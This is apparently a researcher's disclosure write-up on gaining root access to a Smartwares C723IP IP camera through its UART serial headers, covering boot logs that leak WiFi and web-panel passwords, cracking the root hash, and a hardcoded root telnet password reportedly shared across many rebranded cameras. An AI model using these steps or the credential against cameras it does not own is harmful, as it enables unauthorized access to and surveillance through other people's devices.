This is a writeup for some vulnerabilities that I found in the Smartwares C723IP Camera.
I’ve contacted the seller of this camera regarding my findings, but they didn’t respond. Enough time has passed where I feel it is appropriate to post this writeup.
Required Hardware:
- USB to TTL converter.
You can get these pretty cheap on amazon (~$7):
https://www.amazon.com/WINGONEER-CP2102-Module-Serial-Converter/dp/B01LRVQIFQ
If you don’t mind waiting a couple of weeks to receive it, you can order them on aliexpress for even cheaper (~$1):
https://www.aliexpress.com/item/1pcs-CP2102-module-USB-to-TTL-serial-UART-STC-download-cable-PL2303-Super-Brush-line-upgrade/32694152202.html
The Bus Pirate and the Attify Badge also work. Although they are a fair bit more expensive due to their added compatibility with other protocols. - A basic Philips head screwdriver.
- x3 male to female jumper cables.
Required Software:
- baudrate.py
- screen
- JohnTheRipper
For this writeup, I’m going to be using the Attify badge. All the steps will be the same no matter which device you are using. In addition, I’m running all of the tools on a Ubuntu based distribution.
Before taking the camera apart, I connected it to a test network and ran a nmap scan against it:
- 23/tcp open telnet security DVR telnetd (many brands)
- 80/tcp open http mini_httpd 1.21 18oct2014
- 554/tcp open rtsp
- 8081/tcp open blackice-icecap?
Looking up that version of mini_httpd shows that there are two buffer overflow vulnerabilities:
Fantastic start. But I want to keep looking.
There is also a telnet service running, which isn’t a documented feature. We’ll keep this in mind for later.
Casing removed, the camera looks like this:
To the left to the lens, right below the screw, there are a row of headers.
I’m interested in the top three of them. Labelled RX,TX, and GND.
TX = Transmitting
RX = Receiving
GND = Ground
The first step would normally be using a multimeter to determine which header is which, but thankfully the manufacturer of this camera labelled them for us. There’s also a hole, so soldering the jumper cables to the board isn’t really required here.
Make sure that the camera is unplugged from its power source before continuing.
Connect the TX on the camera to the RX on your adapter of choice from the above list. Repeat this for the camera’s RX to the adapter’s TX. Finally connect GND to GND.
You can now connect the adapter to the computer.
Confirm that the computer can see it by running “ls /dev/” and looking for “ttyUSB0”.
If you have multiple ttyUSB’s, unplug the adapter and run the command again, taking note of which one is removed.
Download the baudrate.py script and make it executable with “chmod +x baudrate.py”.
Running the script will automatically check for “/dev/ttyUSB0”. You can supply a different path with the -p argument if yours isn’t USB0.
With the script running, plug the camera into a power supply and within seconds you should be able to see output. If the text isn’t displaying properly, you can use the up and down arrows to change the baud rate.
In the case of this camera, a baud rate of 115200 worked for me.
During the boot, I noticed two more issues.
Both the WiFi’s PSK, and the user-set credentials for the web panel are being shown in plain text.
-
get user0:admin:password123:0
-
user0:name:admin,passed:password123,leave:0
-
ssid=testnetwork
-
pass=supersecurepassword
Let’s see what else we can find.
Once you have the baud rate you can close out of the script and execute screen, supplying the path and the baud rate. Make sure to run this as root as well.
sudo screen /dev/ttyUSB0 115200
And boom, unauthenticated root shell on the camera!
If we check out /etc/passwd, we can see the root password stored as a salted MD5 hash.
Let’s try to crack it using JohnTheRipper:
and it took an entire 32 seconds to brute force on my laptop…
Such a secure password.
We can now telnet into the device as root with the new found creds of root:apix:
When checking to see if these vulnerabilities were already disclosed, I found this post regarding a different vulnerability found in some WiFi cameras back in 2017:
It seems that Smartwares is one of many companies purchasing re-branded generic IP cameras from a manufacturer in China.
This post claims that over 1250 different camera models were vulnerable in 20, due to the same software running on all of them.
Since I only have this one camera, I am not able to confirm it, but it seems likely that these found credentials would allow an attacker to telnet into a decent portion of cameras from this manufacturer.
I also plan on taking a look at the web interface and the app, but that will be for later.
If you have any questions or feel that I missed any helpful details, feel free to let me know!